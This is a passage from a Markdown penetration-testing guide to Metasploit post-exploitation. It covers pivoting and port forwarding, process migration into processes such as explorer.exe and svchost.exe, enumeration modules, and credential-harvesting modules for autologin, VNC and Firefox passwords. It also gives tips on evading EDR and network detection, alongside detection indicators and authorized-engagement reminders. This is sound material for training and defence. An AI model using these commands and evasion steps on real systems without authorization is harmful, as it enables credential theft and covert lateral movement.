localhost 668 > 2. **SRVPORT 1080**: Standard SOCKS port (configurable) 669 > 3. **VERSION 4a**: SOCKS4a protocol with DNS proxying support 670 > 4. **run -j**: Run as background job (non-blocking) 671 > 5. *Configure [proxychains4.conf](https://github.com/haad/proxychains) with `socks4 127.0.0.1 1080` before use* 672 673 ### Port Forwarding Techniques 674 675 | Technique | Use Case | Command Pattern | 676 |:---|:---|:---| 677 | Local Port Forward | Access internal service via localhost | `portfwd add -l <local> -p <remote> -r <IP>` | 678 | Reverse Port Forward | Expose attacker service to target network | `portfwd add -R -l <local> -p <remote> -L <IP>` | 679 | SOCKS Proxy | Route all traffic through pivot | `auxiliary/server/socks_proxy` | 680 | Dynamic Tunneling | SSH-style dynamic forwarding | Use with [proxychains](https://github.com/haad/proxychains) | 681 682 > **Note —** + OPSEC and Detection Considerations 683 > 1. Pivoting generates east-west (lateral) traffic—anomaly for workstations 684 > 2. SOCKS proxy traffic encapsulated in [Meterpreter](https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/) session—inspect session traffic patterns 685 > 3. Port forwards create listening sockets on attacker—egress firewall may block initial callback 686 > 4. Large data transfers through pivot = bandwidth anomaly 687 > 5. NetFlow/Zeek logs may reveal unusual internal connections 688 > 6. Workstation-to-server traffic patterns differ from normal user behavior 689 690 > **Note —** + Common Errors and Solutions 691 > 1. **"Route addition failed"**: Subnet overlap or incorrect CIDR notation—verify with `autoroute -p` 692 > 2. **Port forward fails**: Target port not open or host unreachable—verify with `ping`, `portscan` module 693 > 3. **SOCKS proxy not working**: Check `proxychains.conf` syntax and SOCKS version (4a vs 5) 694 > 4. **"Connection refused" on forwarded port**: Service not running on target or local port conflict 695 > 5. **Slow pivot performance**: Network latency or bandwidth limitations—optimize traffic 696 697 > **Note —** + Advanced Pivoting Techniques 698 > 6. **Multi-hop pivoting**: Chain multiple compromised hosts for deep network access 699 > 7. **DNS tunneling**: Exfiltrate data through DNS queries when other protocols blocked 700 > 8. **SSH dynamic forwarding**: Alternative to SOCKS proxy using SSH `-D` flag 701 > 9. **VPN setup**: Establish full network-layer access through compromised host 702 > 10. **HTTP/HTTPS tunneling**: Bypass proxy restrictions using application-layer protocols 703 704 --- 705 706 ## Process Migration 707 708 > **Note —** + Prerequisites 709 > 1. Active [Meterpreter](https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/) session 710 > 2. Appropriate privileges (admin required for SYSTEM processes) 711 > 3. Understanding of target process architecture (x86/x64) 712 > 4. Knowledge of stable, long-running processes on target 713 714 ### Core Migration Commands 715 716 ```bash 717 ps # List processes 718 migrate <PID> # Migrate to target process 719 getpid # Show current process ID 720 ``` 721 722 > **Note —** + Command Breakdown 723 > 1. **ps -S <name>**: Filter process list by name for quick identification 724 > 2. **ps -A <arch>**: Filter by architecture (x86/x64) for compatibility 725 > 3. **migrate <PID>**: Injects [Meterpreter](https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/) payload into target process memory 726 > 4. **getpid**: Verify current process ID before and after migration 727 > 5. *Always migrate away from initial exploit process (often unstable or will close)* 728 729 ### Migration Workflow 730 731 ```bash 732 # List processes 733 ps 734 735 # Find stable process (e.g., explorer.exe) 736 ps -S explorer.exe 737 738 # Migrate to explorer 739 migrate 1234 # Use actual PID from ps output 740 741 # Verify migration 742 getpid 743 744 # Migrate to x64 process if session is x86 745 ps -A x64 746 migrate 5678 747 748 # For stealth, migrate to legitimate long-running process 749 ps -S svchost.exe 750 migrate 2468 751 ``` 752 753 > **Note —** + Process Selection Criteria 754 > 1. **Stability**: Long-running processes unlikely to terminate (explorer.exe, svchost.exe) 755 > 2. **Architecture**: Match [Meterpreter](https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/) architecture (x86/x64) to target process 756 > 3. **Privilege level**: Match current privileges (user→user, SYSTEM→SYSTEM) 757 > 4. **Stealth**: Legitimate system processes blend with normal operations 758 > 5. **User context**: Same user session to avoid cross-session injection alerts 759 760 ### Recommended Migration Targets 761 762 | Process | Privilege | Stability | Stealth | Notes | 763 |:---|:---|:---|:---|:---| 764 | explorer.exe | User | High | High | User desktop process, always running | 765 | svchost.exe | SYSTEM | High | Medium | Multiple instances, choose carefully | 766 | spoolsv.exe | SYSTEM | High | Medium | Print spooler service | 767 | winlogon.exe | SYSTEM | High | Low | Protected process on modern Windows | 768 | lsass.exe | SYSTEM | High | Very Low | Protected, instant EDR alert | 769 770 > **Note —** + OPSEC and Detection Considerations 771 > 1. Migration = process injection (CreateRemoteThread, WriteProcessMemory)—EDR signatures exist 772 > 2. Migrating to security product process (AV, EDR agent) = instant detection/crash 773 > 3. Injecting across session boundaries (different user) requires SeDebugPrivilege 774 > 4. Memory forensics: Injected code lacks corresponding image file—indicator of compromise 775 > 5. Prefer processes with same privilege level and architecture as current session 776 > 6. API call patterns (OpenProcess→VirtualAllocEx→WriteProcessMemory→CreateRemoteThread) heavily monitored 777 778 > **Note —** + Common Errors and Solutions 779 > 1. **"Migration failed"**: Target process protected, wrong architecture, or insufficient privileges 780 > 2. **Session dies after migration**: Target process crashed or terminated—choose stable process 781 > 3. **"Access is denied"**: Need SYSTEM to migrate into SYSTEM processes—run `getsystem` first 782 > 4. **Architecture mismatch**: Migrating x86→x64 or vice versa fails—match architectures 783 > 5. **Process protected**: Windows 10+ protects certain processes (PPL, ELAM)—choose alternative 784 785 > **Note —** + Migration Best Practices 786 > 6. Migrate immediately after exploitation to stable process 787 > 7. Avoid security software processes (will crash session) 788 > 8. Match architecture to maximize command compatibility 789 > 9. Choose processes with multiple instances (svchost.exe) for better hiding 790 > 10. For credential dumping, migrate to same session as target user 791 > 11. Document original PID for forensic cleanup and incident response 792 793 --- 794 795 ## Post-Exploitation Modules 796 797 > **Note —** + Prerequisites 798 > 1. Active [Meterpreter](https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/) session 799 > 2. Background session to run modules from msfconsole 800 > 3. Appropriate privileges for target module functionality 801 > 4. Understanding of target environment ([Active Directory](https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/get-started/virtual-dc/active-directory-domain-services-overview), workgroup, domain-joined) 802 803 ### Enumeration Modules 804 805 ```bash 806 # Enumeration 807 background 808 use post/windows/gather/enum_domain # Enumerate AD domain info 809 use post/windows/gather/enum_shares # Enumerate network shares 810 use post/windows/gather/enum_applications # List installed software 811 use post/windows/gather/enum_logged_on_users # Active user sessions 812 use post/windows/gather/enum_patches # Installed patches/KBs 813 814 # Set session and run 815 set SESSION 1 816 run 817 ``` 818 819 > **Note —** + Enumeration Module Breakdown 820 > 1. **enum_domain**: Queries [Active Directory](https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/get-started/virtual-dc/active-directory-domain-services-overview) for domain controllers, users, groups, trust relationships 821 > 2. **enum_shares**: Discovers [SMB](https://learn.microsoft.com/en-us/windows-server/storage/file-server/file-server-smb-overview) shares on network (potential lateral movement targets) 822 > 3. **enum_applications**: Lists installed software with versions (vulnerability research) 823 > 4. **enum_logged_on_users**: Identifies active sessions (credential harvesting targets) 824 > 5. **enum_patches**: Cross-references missing KBs with exploit database 825 > 6. *Modules save results to Metasploit loot/credentials database—access with `loot`, `creds` commands* 826 827 ### Credential Gathering Modules 828 829 ```bash 830 # Credential gathering 831 use post/windows/gather/credentials/windows_autologin # Auto-login creds 832 use post/windows/gather/credentials/credential_collector 833 use post/multi/gather/firefox_creds # Browser credentials 834 use post/windows/gather/credentials/vnc # VNC passwords 835 836 # Set session and run 837 set SESSION 1 838 run 839 ``` 840 841 > **Note —** + Credential Module Breakdown 842 > 1. **windows_autologin**: Extracts plaintext credentials from registry (auto-logon feature) 843 > 2. **credential_collector**: Aggregates credentials from multiple sources (registry, files, memory) 844 > 3. **firefox_creds**: Decrypts saved [Firefox](https://www.mozilla.org/firefox/) passwords from profile 845 > 4. **vnc**: Extracts [VNC](https://www.realvnc.com/) passwords from registry (weak encryption) 846 847 ### Network Enumeration Modules 848 849 ```bash 850 # Network 851 use post/multi/gather/ping_sweep # Ping sweep internal network 852 use post/windows/gather/arp_scanner # ARP scan 853 use post/windows/gather/enum_domain_computers # List domain computers 854 855 # Set session and run 856 set SESSION 1 857 set RHOSTS 10.10.10.0/24 # For network modules 858 run 859 ``` 860 861 > **Note —** + Network Module Breakdown 862 > 1. **ping_sweep**: ICMP echo requests to discover live hosts on internal subnet 863 > 2. **arp_scanner**: Examines ARP cache and performs ARP scans (Layer 2 discovery) 864 > 3. **enum_domain_computers**: Queries [Active Directory](https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/get-started/virtual-dc/active-directory-domain-services-overview) for all domain-joined computers 865 > 4. *Network scans generate traffic patterns detectable by NIDS/NIPS* 866 867 ### Practical Module Examples 868 869 ```bash 870 # Enumerate domain 871 background 872 use post/windows/gather/enum_domain 873 set SESSION 1 874 run 875 876 # Find network shares 877 use post/windows/gather/enum_shares 878 set SESSION 1 879 run 880 881 # Check installed patches 882 use post/windows/gather/enum_patches 883 set SESSION 1 884 run 885 886 # Discover live hosts on internal network 887 use post/multi/gather/ping_sweep 888 set SESSION 1 889 set RHOSTS 10.10.10.0/24 890 run 891 892 # Dump saved browser credentials 893 use post/multi/gather/firefox_creds 894 set SESSION 1 895 run 896 ``` 897 898 > **Note —** + Module Output and Database Integration 899 > 1. **loot command**: View all collected files and data from post modules 900 > 2. **creds command**: Display extracted credentials from all sources 901 > 3. **hosts command**: Show discovered hosts from network enumeration 902 > 4. **services command**: List identified services on enumerated hosts 903 > 5. *All module results automatically saved to [Metasploit](https://www.metasploit.com/) database for analysis* 904 905 ### Module Output Interpretation 906 907 | Module Type | Key Information | Action Items | 908 |:---|:---|:---| 909 | Domain Enumeration | Domain controllers, trust relationships | Map AD infrastructure | 910 | Share Enumeration | Writable shares, sensitive data | Lateral movement, exfiltration | 911 | Patch Enumeration | Missing KBs | Privilege escalation exploits | 912 | User Enumeration | Active sessions, admin users | Credential harvesting targets | 913 | Network Discovery | Live hosts, open ports | Expand attack surface | 914 915 > **Note —** + OPSEC and Detection Considerations 916 > 1. Enumeration modules generate suspicious activity (LDAP queries, [SMB](https://learn.microsoft.com/en-us/windows-server/storage/file-server/file-server-smb-overview) enumeration, network scanning) 917 > 2. Domain queries hit domain controller—logs at DC ([Event 4662](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662), [4624](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4624)) 918 > 3. Share enumeration = [SMB](https://learn.microsoft.com/en-us/windows-server/storage/file-server/file-server-smb-overview) traffic spike—NetBIOS/SMB anomaly detection 919 > 4. Ping sweeps = ICMP flood or rapid connection attempts—NIDS/NIPS alerts 920 > 5. Spread activity over time to blend with normal traffic 921 > 6. Consider using native Windows tools ([PowerShell](https://learn.microsoft.com/en-us/powershell/), net commands) for stealthier enumeration 922 923 > **Note —** + Common Errors and Solutions 924 > 1. **"No results returned"**: Insufficient privileges or target not domain-joined—verify with `getuid` 925 > 2. **Module hangs**: Network timeout—adjust `set TIMEOUT` value in module options 926 > 3. **"Session not valid"**: Session died during module run—check session stability with `sessions -l` 927 > 4. **Database not initialized**: Run `msfdb init` to set up [PostgreSQL](https://www.postgresql.org/) database 928 > 5. **Empty loot output**: Module failed silently—check msfconsole logs for errors 929 930 > **Note —** + Post-Exploitation Module Workflow 931 > 6. Start with system enumeration (`enum_domain`, `enum_patches`) 932 > 7. Gather credentials from all sources (`credential_collector`, browser modules) 933 > 8. Enumerate network (`ping_sweep`, `arp_scanner`) 934 > 9. Identify lateral movement targets (`enum_shares`, `enum_domain_computers`) 935 > 10. Document all findings in engagement notes for reporting 936 937 --- 938 939 ## Final OPSEC Reminders 940 941 > **Note —** + Critical Security Considerations 942 > 1. [Meterpreter](https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/) = known malware; mature EDR will detect/block without evasion 943 > 2. Consider custom payloads, obfuscation, or C2 frameworks ([Cobalt Strike](https://www.cobaltstrike.com/), [Covenant](https://github.com/cobbr/Covenant), [Sliver](https://github.com/BishopFox/sliver)) for real-world ops 944 > 3. Always operate within authorized scope; maintain detailed logs and IOC lists for remediation 945 > 4. Test payloads in isolated lab before production engagement 946 > 5. Have out-of-band C2 backup if primary session burned 947 948 > **Note —** + Engagement Best Practices 949 > 6. Document all IOCs (files, registry keys, services, scheduled tasks) for client remediation 950 > 7. Maintain communication with client point of contact during testing 951 > 8. Have emergency stop procedures if production systems affected 952 > 9. Use encryption for exfiltrated data to protect client confidentiality 953 > 10. Provide comprehensive cleanup scripts and remediation guidance in final report 954 955 --- 956 957 ## References 958 959 1. [Offensive Security Metasploit Unleashed](https://www.offensive-security.com/metasploit-unleashed/) 960 2. [Rapid7 Metasploit Framework Documentation](https://docs.rapid7.com/metasploit/) 961 3. [Gentilkiwi Mimikatz GitHub](https://github.com/gentilkiwi/mimikatz) 962 4. [MITRE ATT&CK Framework](https://attack.mitre.org/) 963 5. [HackTricks - Pentesting Methodology](https://book.hacktricks.xyz/) 964 6. [Microsoft Windows Security Documentation](https://learn.microsoft.com/en-us/windows/security/) 965 7. [Offensive Security OSCP Study Guide](https://www.offensive-security.com/pwk-oscp/) 966 8. [SANS Penetration Testing Resources](https://www.sans.org/cyber-security-courses/penetration-testing/) 967 968 #Metasploit #Meterpreter #Post-Exploitation #Credential-Dumping #Pivoting #Windows #Penetration-Testing #Red-Team #Kiwi #Mimikatz #Process-Migration #Privilege-Escalation #Persistence #OPSEC